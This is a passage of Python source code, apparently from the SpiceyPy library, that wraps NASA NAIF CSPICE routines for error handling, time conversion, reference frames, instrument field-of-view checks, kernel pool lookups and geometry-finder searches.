    return stypes.toPythonString(actionptr)
def errch(marker, string):
    """
    Substitute a character string for the first occurrence of
    a marker in the current long error message.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/errch_c.html

    :param marker: A substring of the error message to be replaced.
    :type marker: str
    :param string: The character string to substitute for marker.
    :type string: str
    """
    libspice.errch_c(stypes.stringToCharP(marker),
                     stypes.stringToCharP(string))
def errdev(op, lenout, device):
    """
    Retrieve or set the name of the current output device for error messages.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/errdev_c.html

    :param op: The operation, "GET" or "SET".
    :type op: str
    :param lenout: Length of device for output.
    :type lenout: int
    :param device: The device name.
    :type device: str
    :return: The device name.
    :rtype: str
    """
    buflen = ctypes.c_int(lenout)
    # The device buffer is both input ("SET") and output ("GET"), so use a
    # mutable buffer and pass a char* aliasing it.
    devbuf = ctypes.create_string_buffer(str.encode(device), buflen.value)
    devptr = ctypes.c_char_p(ctypes.addressof(devbuf))
    libspice.errdev_c(stypes.stringToCharP(op), buflen, devptr)
    return stypes.toPythonString(devptr)
def errdp(marker, number):
    """
    Substitute a double precision number for the first occurrence of
    a marker found in the current long error message.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/errdp_c.html

    :param marker: A substring of the error message to be replaced.
    :type marker: str
    :param number: The d.p. number to substitute for marker.
    :type number: float
    """
    libspice.errdp_c(stypes.stringToCharP(marker), ctypes.c_double(number))
def errint(marker, number):
    """
    Substitute an integer for the first occurrence of a marker found
    in the current long error message.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/errint_c.html

    :param marker: A substring of the error message to be replaced.
    :type marker: str
    :param number: The integer to substitute for marker.
    :type number: int
    """
    libspice.errint_c(stypes.stringToCharP(marker), ctypes.c_int(number))
def errprt(op, lenout, inlist):
    """
    Retrieve or set the list of error message items to be output when an
    error is detected.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/errprt_c.html

    :param op: The operation, "GET" or "SET".
    :type op: str
    :param lenout: Length of list for output.
    :type lenout: int
    :param inlist: Specification of error messages to be output, as a
                   single comma-delimited string (e.g. "SHORT, EXPLAIN").
    :type inlist: str
    :return: Comma-delimited list of error message items.
    :rtype: str
    """
    lenout = ctypes.c_int(lenout)
    op = stypes.stringToCharP(op)
    # inlist is both input ("SET") and output ("GET"): build a mutable
    # buffer of lenout bytes and hand the C routine a char* into it.
    inlist = ctypes.create_string_buffer(str.encode(inlist), lenout.value)
    inlistptr = ctypes.c_char_p(ctypes.addressof(inlist))
    # Bug fix: previously called errdev_c, which sets the error output
    # *device*, not the error message item list.
    libspice.errprt_c(op, lenout, inlistptr)
    return stypes.toPythonString(inlistptr)
def esrchc(value, array):
    """
    Search for a given value within a character string array.
    Return the index of the first equivalent array entry, or -1
    if no equivalent element is found.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/esrchc_c.html

    :param value: Key value to be found in array.
    :type value: str
    :param array: Character string array to search.
    :type array: list of str.
    :return:
            The index of the first array entry equivalent to value,
            or -1 if none is found.
    :rtype: int
    """
    ndim = ctypes.c_int(len(array))
    # Entry width must include the terminating NUL, hence the +1.
    lenvals = ctypes.c_int(max(len(s) for s in array) + 1)
    arr = stypes.listToCharArray(array, xLen=lenvals, yLen=ndim)
    return libspice.esrchc_c(stypes.stringToCharP(value), ndim, lenvals, arr)
@spiceErrorCheck
def et2lst(et, body, lon, typein, timlen=_default_len_out, ampmlen=_default_len_out):
    """
    Given an ephemeris epoch, compute the local solar time for
    an object on the surface of a body at a specified longitude.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/et2lst_c.html

    :param et: Epoch in seconds past J2000 epoch.
    :type et: float
    :param body: ID-code of the body of interest.
    :type body: int
    :param lon: Longitude of surface point (RADIANS).
    :type lon: float
    :param typein: Type of longitude "PLANETOCENTRIC", etc.
    :type typein: str
    :param timlen: Available room in output time string.
    :type timlen: int
    :param ampmlen: Available room in output ampm string.
    :type ampmlen: int
    :return:
            Local hour on a "24 hour" clock,
            Minutes past the hour,
            Seconds past the minute,
            String giving local time on 24 hour clock,
            String giving time on A.M. / P.M. scale.
    :rtype: tuple
    """
    et = ctypes.c_double(et)
    body = ctypes.c_int(body)
    lon = ctypes.c_double(lon)
    typein = stypes.stringToCharP(typein)
    timlen = ctypes.c_int(timlen)
    ampmlen = ctypes.c_int(ampmlen)
    # Numeric outputs: hour, minute, second of local solar time.
    hr = ctypes.c_int()
    mn = ctypes.c_int()
    sc = ctypes.c_int()
    # String outputs: 24-hour clock form and A.M./P.M. form.
    time = stypes.stringToCharP(timlen)
    ampm = stypes.stringToCharP(ampmlen)
    libspice.et2lst_c(et, body, lon, typein, timlen, ampmlen,
                      ctypes.byref(hr), ctypes.byref(mn), ctypes.byref(sc),
                      time, ampm)
    return hr.value, mn.value, sc.value, stypes.toPythonString(
            time), stypes.toPythonString(ampm)
@spiceErrorCheck
def et2utc(et, formatStr, prec, lenout=_default_len_out):
    """
    Convert an input time from ephemeris seconds past J2000
    to Calendar, Day-of-Year, or Julian Date format, UTC.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/et2utc_c.html

    :param et: Input epoch, given in ephemeris seconds past J2000.
    :type et: float
    :param formatStr: Format of output epoch.
    :type formatStr: str
    :param prec: Digits of precision in fractional seconds or days.
    :type prec: int
    :param lenout: The length of the output string plus 1.
    :type lenout: int
    :return: Output time string in UTC
    :rtype: str
    """
    outlen = ctypes.c_int(lenout)
    utcstr = stypes.stringToCharP(outlen)
    libspice.et2utc_c(ctypes.c_double(et), stypes.stringToCharP(formatStr),
                      ctypes.c_int(prec), outlen, utcstr)
    return stypes.toPythonString(utcstr)
@spiceErrorCheck
def etcal(et, lenout=_default_len_out):
    """
    Convert from an ephemeris epoch measured in seconds past
    the epoch of J2000 to a calendar string format using a
    formal calendar free of leapseconds.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/etcal_c.html

    :param et: Ephemeris time measured in seconds past J2000.
    :type et: Union[float,Iterable[float]]
    :param lenout: Length of output string.
    :type lenout: int
    :return: A standard calendar representation of et.
    :rtype: str
    """
    lenout = ctypes.c_int(lenout)
    # Shared output buffer, reused across iterations in the vectorized path.
    string = stypes.stringToCharP(lenout)
    # Vectorized path: any iterable of times yields a list of strings.
    if hasattr(et, "__iter__"):
        strings = []
        for t in et:
            # t is passed without an explicit c_double wrapper — presumably
            # etcal_c's argtypes perform the conversion; TODO confirm.
            libspice.etcal_c(t, lenout, string)
            # The decorator only checks after the final return, so check
            # for SPICE errors explicitly on every element.
            checkForSpiceError(None)
            strings.append(stypes.toPythonString(string))
        return strings
    else:
        et = ctypes.c_double(et)
        libspice.etcal_c(et, lenout, string)
        return stypes.toPythonString(string)
@spiceErrorCheck
def eul2m(angle3, angle2, angle1, axis3, axis2, axis1):
    """
    Construct a rotation matrix from a set of Euler angles.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eul2m_c.html

    :param angle3: Rotation angle about third rotation axis (radians).
    :type angle3: float
    :param angle2: Rotation angle about second rotation axis (radians).
    :type angle2: float
    :param angle1: Rotation angle about first rotation axis (radians).
    :type angle1: float
    :param axis3: Axis number of third rotation axis.
    :type axis3: int
    :param axis2: Axis number of second rotation axis.
    :type axis2: int
    :param axis1: Axis number of first rotation axis.
    :type axis1: int
    :return: Product of the 3 rotations.
    :rtype: 3x3-Element Array of floats
    """
    rotmat = stypes.emptyDoubleMatrix()
    libspice.eul2m_c(ctypes.c_double(angle3), ctypes.c_double(angle2),
                     ctypes.c_double(angle1), ctypes.c_int(axis3),
                     ctypes.c_int(axis2), ctypes.c_int(axis1), rotmat)
    return stypes.cMatrixToNumpy(rotmat)
@spiceErrorCheck
def eul2xf(eulang, axisa, axisb, axisc):
    """
    This routine computes a state transformation from an Euler angle
    factorization of a rotation and the derivatives of those Euler
    angles.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eul2xf_c.html
    :param eulang: An array of Euler angles and their derivatives.
    :type eulang: 6-Element Array of floats
    :param axisa: Axis A of the Euler angle factorization.
    :type axisa: int
    :param axisb: Axis B of the Euler angle factorization.
    :type axisb: int
    :param axisc: Axis C of the Euler angle factorization.
    :type axisc: int
    :return: A state transformation matrix.
    :rtype: 6x6-Element Array of floats
    """
    # Use ``==`` rather than ``is``: identity comparison against an int
    # literal relies on CPython's small-int caching and emits a
    # SyntaxWarning on modern Python versions.
    assert len(eulang) == 6
    eulang = stypes.toDoubleVector(eulang)
    axisa = ctypes.c_int(axisa)
    axisb = ctypes.c_int(axisb)
    axisc = ctypes.c_int(axisc)
    xform = stypes.emptyDoubleMatrix(x=6, y=6)
    libspice.eul2xf_c(eulang, axisa, axisb, axisc, xform)
    return stypes.cMatrixToNumpy(xform)
@spiceErrorCheck
def exists(fname):
    """
    Test whether the named file exists.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/exists_c.html
    :param fname: Name of the file in question.
    :return: True if the file exists, False otherwise.
    :rtype: bool
    """
    fname_p = stypes.stringToCharP(fname)
    return bool(libspice.exists_c(fname_p))
@spiceErrorCheck
def expool(name):
    """
    Check whether a kernel variable is present in the kernel pool.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/expool_c.html
    :param name: Name of the variable whose value is to be returned.
    :type name: str
    :return: True when the variable is in the pool.
    :rtype: bool
    """
    name_p = stypes.stringToCharP(name)
    # SpiceBoolean is a plain int on the C side.
    found = ctypes.c_int()
    libspice.expool_c(name_p, ctypes.byref(found))
    return bool(found.value)
################################################################################
# F
def failed():
    """
    Report whether an error condition has been signalled via sigerr_c.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/failed_c.html
    :return: a boolean
    :rtype: bool
    """
    # Not wrapped with @spiceErrorCheck, presumably because the error-check
    # machinery itself relies on this query -- TODO confirm.
    return bool(libspice.failed_c())
@spiceErrorCheck
def fn2lun(fname):
    """
    Internal undocumented command for mapping the name of an open file
    to its FORTRAN (F2C) logical unit.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/FORTRAN/spicelib/fn2lun.html
    :param fname: name of the file to be mapped to its logical unit.
    :type fname: str
    :return: the FORTRAN (F2C) logical unit associated with the filename.
    :rtype: int
    """
    fname_p = stypes.stringToCharP(fname)
    unit = ctypes.c_int()
    # Hidden Fortran string-length argument; the +1 presumably accounts
    # for the terminating NUL -- TODO confirm against the f2c convention.
    namelen = ctypes.c_int(len(fname) + 1)
    libspice.fn2lun_(fname_p, ctypes.byref(unit), namelen)
    return unit.value
@spiceErrorCheck
def fovray(inst, raydir, rframe, abcorr, observer, et):
    """
    Check whether a given ray lies inside the field-of-view (FOV) of a
    specified instrument at a specified epoch.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/fovray_c.html
    :param inst: Name or ID code string of the instrument.
    :type inst: str
    :param raydir: Ray's direction vector.
    :type raydir: 3-Element Array of floats
    :param rframe: Body-fixed, body-centered frame for target body.
    :type rframe: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param observer: Name or ID code string of the observer.
    :type observer: str
    :param et: Time of the observation (seconds past J2000).
    :type et: float
    :return: Visibility flag
    :rtype: bool
    """
    inst_p = stypes.stringToCharP(inst)
    raydir_v = stypes.toDoubleVector(raydir)
    rframe_p = stypes.stringToCharP(rframe)
    abcorr_p = stypes.stringToCharP(abcorr)
    observer_p = stypes.stringToCharP(observer)
    et_c = ctypes.c_double(et)
    visible = ctypes.c_int()
    # fovray_c takes et by pointer.
    libspice.fovray_c(inst_p, raydir_v, rframe_p, abcorr_p, observer_p,
                      ctypes.byref(et_c), ctypes.byref(visible))
    return bool(visible.value)
@spiceErrorCheck
def fovtrg(inst, target, tshape, tframe, abcorr, observer, et):
    """
    Check whether a specified ephemeris object lies inside the
    field-of-view (FOV) of a given instrument at a given epoch.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/fovtrg_c.html
    :param inst: Name or ID code string of the instrument.
    :type inst: str
    :param target: Name or ID code string of the target.
    :type target: str
    :param tshape: Type of shape model used for the target.
    :type tshape: str
    :param tframe: Body-fixed, body-centered frame for target body.
    :type tframe: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param observer: Name or ID code string of the observer.
    :type observer: str
    :param et: Time of the observation (seconds past J2000).
    :type et: float
    :return: Visibility flag
    :rtype: bool
    """
    inst_p = stypes.stringToCharP(inst)
    target_p = stypes.stringToCharP(target)
    tshape_p = stypes.stringToCharP(tshape)
    tframe_p = stypes.stringToCharP(tframe)
    abcorr_p = stypes.stringToCharP(abcorr)
    observer_p = stypes.stringToCharP(observer)
    et_c = ctypes.c_double(et)
    visible = ctypes.c_int()
    # fovtrg_c takes et by pointer.
    libspice.fovtrg_c(inst_p, target_p, tshape_p, tframe_p, abcorr_p,
                      observer_p, ctypes.byref(et_c), ctypes.byref(visible))
    return bool(visible.value)
@spiceErrorCheck
def frame(x):
    """
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/frame_c.html
    :param x: Input vector. A parallel unit vector on output.
    :type x: 3-Element Array of floats
    :return: a tuple of 3 list[3]
    :rtype: tuple
    """
    # x is modified in place by frame_c; y and z are pure outputs.
    x_v = stypes.toDoubleVector(x)
    y_v = stypes.emptyDoubleVector(3)
    z_v = stypes.emptyDoubleVector(3)
    libspice.frame_c(x_v, y_v, z_v)
    return (stypes.cVectorToPython(x_v),
            stypes.cVectorToPython(y_v),
            stypes.cVectorToPython(z_v))
@spiceErrorCheck
@spiceFoundExceptionThrower
def frinfo(frcode):
    """
    Look up the attributes associated with a reference frame ID code.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/frinfo_c.html
    :param frcode: the idcode for some frame.
    :type frcode: int
    :return: a tuple of attributes associated with the frame.
    :rtype: tuple
    """
    code_c = ctypes.c_int(frcode)
    center = ctypes.c_int()
    frclass = ctypes.c_int()
    classid = ctypes.c_int()
    found = ctypes.c_int()
    libspice.frinfo_c(code_c, ctypes.byref(center), ctypes.byref(frclass),
                      ctypes.byref(classid), ctypes.byref(found))
    return center.value, frclass.value, classid.value, bool(found.value)
@spiceErrorCheck
def frmnam(frcode, lenout=_default_len_out):
    """
    Look up the name of the reference frame associated with a SPICE ID code.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/frmnam_c.html
    :param frcode: an integer code for a reference frame
    :type frcode: int
    :param lenout: Maximum length of output string.
    :type lenout: int
    :return: the name associated with the reference frame.
    :rtype: str
    """
    code_c = ctypes.c_int(frcode)
    lenout_c = ctypes.c_int(lenout)
    name_p = stypes.stringToCharP(lenout_c)
    libspice.frmnam_c(code_c, lenout_c, name_p)
    return stypes.toPythonString(name_p)
@spiceErrorCheck
def ftncls(unit):
    """
    Close the file designated by a Fortran-style integer logical unit.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ftncls_c.html
    :param unit: Fortran-style logical unit.
    :type unit: int
    """
    libspice.ftncls_c(ctypes.c_int(unit))
@spiceErrorCheck
def furnsh(path):
    """
    Load one or more SPICE kernels into a program.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/furnsh_c.html
    :param path: one or more paths to kernels
    :type path: str or list of str
    """
    # Generalized to accept tuples of paths as well as lists; a plain
    # string (a single kernel path) is loaded directly.
    if isinstance(path, (list, tuple)):
        for p in path:
            libspice.furnsh_c(stypes.stringToCharP(p))
    else:
        libspice.furnsh_c(stypes.stringToCharP(path))
################################################################################
# G
@spiceErrorCheck
@spiceFoundExceptionThrower
def gcpool(name, start, room, lenout=_default_len_out):
    """
    Return the character value of a kernel variable from the kernel pool.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gcpool_c.html
    :param name: Name of the variable whose value is to be returned.
    :type name: str
    :param start: Which component to start retrieving for name.
    :type start: int
    :param room: The largest number of values to return.
    :type room: int
    :param lenout: The length of the output string.
    :type lenout: int
    :return: Values associated with name.
    :rtype: list of str
    """
    name = stypes.stringToCharP(name)
    start = ctypes.c_int(start)
    room = ctypes.c_int(room)
    lenout = ctypes.c_int(lenout)
    # n receives the number of values actually returned by CSPICE.
    n = ctypes.c_int()
    # Output buffer: `room` strings of `lenout` characters each.
    cvals = stypes.emptyCharArray(lenout, room)
    # SpiceBoolean "found" flag; consumed by @spiceFoundExceptionThrower.
    found = ctypes.c_int()
    libspice.gcpool_c(name, start, room, lenout, ctypes.byref(n),
                      ctypes.byref(cvals), ctypes.byref(found))
    # Only the first n entries of cvals were populated.
    return [stypes.toPythonString(x.value) for x in
            cvals[0:n.value]], bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def gdpool(name, start, room):
    """
    Return the d.p. value of a kernel variable from the kernel pool.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gdpool_c.html
    :param name: Name of the variable whose value is to be returned.
    :type name: str
    :param start: Which component to start retrieving for name.
    :type start: int
    :param room: The largest number of values to return.
    :type room: int
    :return: Values associated with name.
    :rtype: list of float
    """
    name = stypes.stringToCharP(name)
    start = ctypes.c_int(start)
    # Size the output buffer while `room` is still a Python int; it is
    # converted to a c_int only afterwards.
    values = stypes.emptyDoubleVector(room)
    room = ctypes.c_int(room)
    n = ctypes.c_int()
    # SpiceBoolean "found" flag; consumed by @spiceFoundExceptionThrower.
    found = ctypes.c_int()
    libspice.gdpool_c(name, start, room, ctypes.byref(n),
                      ctypes.cast(values, ctypes.POINTER(ctypes.c_double)),
                      ctypes.byref(found))
    # Only the first n values are meaningful.
    return stypes.cVectorToPython(values)[0:n.value], bool(found.value)
@spiceErrorCheck
def georec(lon, lat, alt, re, f):
    """
    Convert geodetic coordinates to rectangular coordinates.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/georec_c.html
    :param lon: Geodetic longitude of point (radians).
    :type lon: float
    :param lat: Geodetic latitude of point (radians).
    :type lat: float
    :param alt: Altitude of point above the reference spheroid.
    :type alt: float
    :param re: Equatorial radius of the reference spheroid.
    :type re: float
    :param f: Flattening coefficient.
    :type f: float
    :return: Rectangular coordinates of point.
    :rtype: 3-Element Array of floats
    """
    lon_c = ctypes.c_double(lon)
    lat_c = ctypes.c_double(lat)
    alt_c = ctypes.c_double(alt)
    re_c = ctypes.c_double(re)
    f_c = ctypes.c_double(f)
    rectan = stypes.emptyDoubleVector(3)
    libspice.georec_c(lon_c, lat_c, alt_c, re_c, f_c, rectan)
    return stypes.cVectorToPython(rectan)
# getcml not really needed
@spiceErrorCheck
def getelm(frstyr, lineln, lines):
    """
    Parse the "lines" of a two-line element set and return the
    elements in units suitable for use in SPICE software.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/getelm_c.html
    :param frstyr: Year of earliest representable two-line elements.
    :type frstyr: int
    :param lineln: Length of strings in lines array.
    :type lineln: int
    :param lines: A pair of "lines" containing two-line elements.
    :type lines: list of str
    :return:
            The epoch of the elements in seconds past J2000,
            The elements converted to SPICE units.
    :rtype: tuple
    """
    frstyr_c = ctypes.c_int(frstyr)
    lineln_c = ctypes.c_int(lineln)
    lines_p = stypes.listToCharArrayPtr(lines, xLen=lineln_c, yLen=2)
    epoch = ctypes.c_double()
    # 10 elements is a guess at the required output length.
    elems = stypes.emptyDoubleVector(10)
    libspice.getelm_c(frstyr_c, lineln_c, lines_p, ctypes.byref(epoch), elems)
    return epoch.value, stypes.cVectorToPython(elems)
@spiceErrorCheck
def getfat(file):
    """
    Determine the file architecture and file type of most SPICE kernel files.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/getfat_c.html
    :param file: The name of a file to be examined.
    :type file: str
    :return: The architecture of the kernel file, The type of the kernel file.
    :rtype: tuple
    """
    file_p = stypes.stringToCharP(file)
    # Architecture and type strings are at most 3 characters plus NUL.
    arclen = ctypes.c_int(4)
    typlen = ctypes.c_int(4)
    arch = stypes.stringToCharP(arclen)
    kertype = stypes.stringToCharP(typlen)
    libspice.getfat_c(file_p, arclen, typlen, arch, kertype)
    return stypes.toPythonString(arch), stypes.toPythonString(kertype)
@spiceErrorCheck
def getfov(instid, room, shapelen=_default_len_out, framelen=_default_len_out):
    """
    This routine returns the field-of-view (FOV) parameters for a
    specified instrument.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/getfov_c.html
    :param instid: NAIF ID of an instrument.
    :type instid: int
    :param room: Maximum number of vectors that can be returned.
    :type room: int
    :param shapelen: Space available in the string shape.
    :type shapelen: int
    :param framelen: Space available in the string frame.
    :type framelen: int
    :return:
            Instrument FOV shape,
            Name of the frame in which FOV vectors are defined,
            Boresight vector,
            Number of boundary vectors returned,
            FOV boundary vectors.
    :rtype: tuple
    """
    instid = ctypes.c_int(instid)
    # Preallocate output strings of the requested lengths.
    shape = stypes.stringToCharP(" " * shapelen)
    framen = stypes.stringToCharP(" " * framelen)
    shapelen = ctypes.c_int(shapelen)
    framelen = ctypes.c_int(framelen)
    bsight = stypes.emptyDoubleVector(3)
    n = ctypes.c_int()
    # Size the boundary-vector matrix while `room` is still a Python int;
    # it is converted to a c_int only afterwards.
    bounds = stypes.emptyDoubleMatrix(x=3, y=room)
    room = ctypes.c_int(room)
    libspice.getfov_c(instid, room, shapelen, framelen, shape, framen, bsight,
                      ctypes.byref(n), bounds)
    # Only the first n boundary vectors are valid.
    return stypes.toPythonString(shape), stypes.toPythonString(
            framen), stypes.cVectorToPython(
            bsight), n.value, stypes.cMatrixToNumpy(bounds)[0:n.value]
def getmsg(option, lenout=_default_len_out):
    """
    Fetch the current short error message, the explanation of the
    short error message, or the long error message.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/getmsg_c.html
    :param option: Indicates type of error message.
    :type option: str
    :param lenout: Available space in the output string msg.
    :type lenout: int
    :return: The error message to be retrieved.
    :rtype: str
    """
    option_p = stypes.stringToCharP(option)
    lenout_c = ctypes.c_int(lenout)
    msg = stypes.stringToCharP(lenout_c)
    libspice.getmsg_c(option_p, lenout_c, msg)
    return stypes.toPythonString(msg)
@spiceErrorCheck
def gfbail():
    """
    Report whether an interrupt signal (SIGINT) has been received.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfbail_c.html
    :return: True if an interrupt signal has been received by the GF handler.
    :rtype: bool
    """
    return bool(libspice.gfbail_c())
@spiceErrorCheck
def gfclrh():
    """
    Reset the interrupt signal handler status so that subsequent calls
    to :func:`gfbail` report that no interrupt was received.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfclrh_c.html
    """
    libspice.gfclrh_c()
@spiceErrorCheck
def gfdist(target, abcorr, obsrvr, relate, refval, adjust, step, nintvls,
           cnfine, result):
    """
    Compute the time window during which a given constraint on the
    observer-target distance holds.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfdist_c.html
    :param target: Name of the target body.
    :type target: str
    :param abcorr: Aberration correction flag.
    :type abcorr: str
    :param obsrvr: Name of the observing body.
    :type obsrvr: str
    :param relate: Relational operator.
    :type relate: str
    :param refval: Reference value.
    :type refval: float
    :param adjust: Adjustment value for absolute extrema searches.
    :type adjust: float
    :param step: Step size used for locating extrema and roots.
    :type step: float
    :param nintvls: Workspace window interval count.
    :type nintvls: int
    :param cnfine: SPICE window to which the search is confined.
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results.
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    # Both windows must be double-precision SpiceCells.
    for cell in (cnfine, result):
        assert isinstance(cell, stypes.SpiceCell)
        assert cell.is_double()
    target_p = stypes.stringToCharP(target)
    abcorr_p = stypes.stringToCharP(abcorr)
    obsrvr_p = stypes.stringToCharP(obsrvr)
    relate_p = stypes.stringToCharP(relate)
    refval_c = ctypes.c_double(refval)
    adjust_c = ctypes.c_double(adjust)
    step_c = ctypes.c_double(step)
    nintvls_c = ctypes.c_int(nintvls)
    libspice.gfdist_c(target_p, abcorr_p, obsrvr_p, relate_p, refval_c,
                      adjust_c, step_c, nintvls_c,
                      ctypes.byref(cnfine), ctypes.byref(result))
def gfevnt():
    """
    Placeholder for the CSPICE routine gfevnt_c, which has not been
    wrapped yet.
    :raise NotImplementedError: always; this wrapper is a stub.
    """
    raise NotImplementedError
@spiceErrorCheck
def gffove(inst, tshape, raydir, target, tframe, abcorr, obsrvr,
           tol, udstep, udrefn, rpt, udrepi, udrepu, udrepf, bail, udbail, cnfine, result):
    """
    Determine time intervals when a specified target body or ray
    intersects the space bounded by the field-of-view (FOV) of a
    specified instrument. Report progress and handle interrupts if so
    commanded.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gffove_c.html
    :param inst: Name of the instrument
    :type inst: str
    :param tshape: Type of shape model used for target body
    :type tshape: str
    :param raydir: Ray s direction vector
    :type raydir: N-Element Array of floats
    :param target: Name of the target body
    :type target: str
    :param tframe: Body fixed body centered frame for target body
    :type tframe: str
    :param abcorr: Aberration correction flag
    :type abcorr: str
    :param obsrvr: Name of the observing body
    :type obsrvr: str
    :param tol: Convergence tolerance in seconds
    :type tol: float
    :param udstep: Name of the routine that returns a time step
    :type udstep: spiceypy.utils.callbacks.UDSTEP
    :param udrefn: Name of the routine that computes a refined time
    :type udrefn: spiceypy.utils.callbacks.UDREFN
    :param rpt: Progress report flag
    :type rpt: bool
    :param udrepi: Function that initializes progress reporting.
    :type udrepi: spiceypy.utils.callbacks.UDREP
    :param udrepu: Function that updates the progress report
    :type udrepu: spiceypy.utils.callbacks.UDREPU
    :param udrepf: Function that finalizes progress reporting
    :type udrepf: spiceypy.utils.callbacks.UDREPF
    :param bail: Logical indicating program interrupt monitoring
    :type bail: bool
    :param udbail: Name of a routine that signals a program interrupt
    :type udbail: spiceypy.utils.callbacks.UDBAIL
    :param cnfine: SPICE window to which the search is restricted
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: SPICE window containing results
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    # Marshal Python arguments into their ctypes equivalents; the
    # callback arguments (udstep, udrefn, udrep*, udbail) are passed
    # through unchanged.
    inst = stypes.stringToCharP(inst)
    tshape = stypes.stringToCharP(tshape)
    raydir = stypes.toDoubleVector(raydir)
    target = stypes.stringToCharP(target)
    tframe = stypes.stringToCharP(tframe)
    abcorr = stypes.stringToCharP(abcorr)
    obsrvr = stypes.stringToCharP(obsrvr)
    tol = ctypes.c_double(tol)
    # SpiceBooleans are plain ints on the C side.
    rpt = ctypes.c_int(rpt)
    bail = ctypes.c_int(bail)
    # NOTE(review): unlike gfdist, cnfine/result are not type-checked
    # here; callers must supply double-precision SpiceCells.
    libspice.gffove_c(inst, tshape, raydir, target, tframe,
                      abcorr, obsrvr, tol, udstep, udrefn, rpt,
                      udrepi, udrepu, udrepf, bail, udbail,
                      ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfilum(method, angtyp, target, illumn,
           fixref, abcorr, obsrvr, spoint,
           relate, refval, adjust, step, nintvls, cnfine, result):
    """
    Return the time window over which a specified constraint on
    the observed phase, solar incidence, or emission angle at
    a specifed target body surface point is met.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfilum_c.html
    :param method: Shape model used to represent the surface of the target body.
    :type method: str
    :param angtyp: The type of illumination angle for which a search is to be performed.
    :type angtyp: str
    :param target: Name of a target body.
    :type target: str
    :param illumn: Name of the illumination source.
    :type illumn: str
    :param fixref: Name of the body-fixed, body-centered reference frame associated with the target body.
    :type fixref: str
    :param abcorr: The aberration corrections to be applied.
    :type abcorr: str
    :param obsrvr: Name of an observing body.
    :type obsrvr: str
    :param spoint: Body-fixed coordinates of a target surface point.
    :type spoint: 3-Element Array of floats
    :param relate: Relational operator used to define a constraint on a specified illumination angle.
    :type relate: str
    :param refval: Reference value used with 'relate' to define an equality or inequality to be satisfied by the specified illumination angle.
    :type refval: float
    :param adjust: Parameter used to modify searches for absolute extrema.
    :type adjust: float
    :param step: Step size to be used in the search.
    :type step: float
    :param nintvls: Number of intervals that can be accommodated by each of the dynamically allocated workspace windows used internally by this routine.
    :type nintvls: int
    :param cnfine: Window that confines the time period over which the specified search is conducted. This can be updated by gfilum
    :type cnfine: spiceypy.utils.support_types.SpiceCell
    :param result: Window of intervals in the confinement window that the illumination angle constraint is satisfied.
    :type result: spiceypy.utils.support_types.SpiceCell
    """
    # Validate the windows as double-precision SpiceCells, consistent
    # with the other GF wrappers (gfdist, gfoclt, gfpa, ...).
    assert isinstance(cnfine, stypes.SpiceCell)
    assert cnfine.is_double()
    assert isinstance(result, stypes.SpiceCell)
    assert result.is_double()
    method = stypes.stringToCharP(method)
    angtyp = stypes.stringToCharP(angtyp)
    target = stypes.stringToCharP(target)
    illumn = stypes.stringToCharP(illumn)
    fixref = stypes.stringToCharP(fixref)
    abcorr = stypes.stringToCharP(abcorr)
    obsrvr = stypes.stringToCharP(obsrvr)
    spoint = stypes.toDoubleVector(spoint)
    relate = stypes.stringToCharP(relate)
    refval = ctypes.c_double(refval)
    adjust = ctypes.c_double(adjust)
    step = ctypes.c_double(step)
    nintvls = ctypes.c_int(nintvls)
    libspice.gfilum_c(method, angtyp, target, illumn,
                      fixref, abcorr, obsrvr, spoint,
                      relate, refval, adjust, step,
                      nintvls, ctypes.byref(cnfine), ctypes.byref(result))
@spiceErrorCheck
def gfinth(sigcode):
    """
    Respond to the interrupt signal SIGINT: record that the signal has
    been received. This routine reinstalls itself as the SIGINT handler.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gfinth_c.html
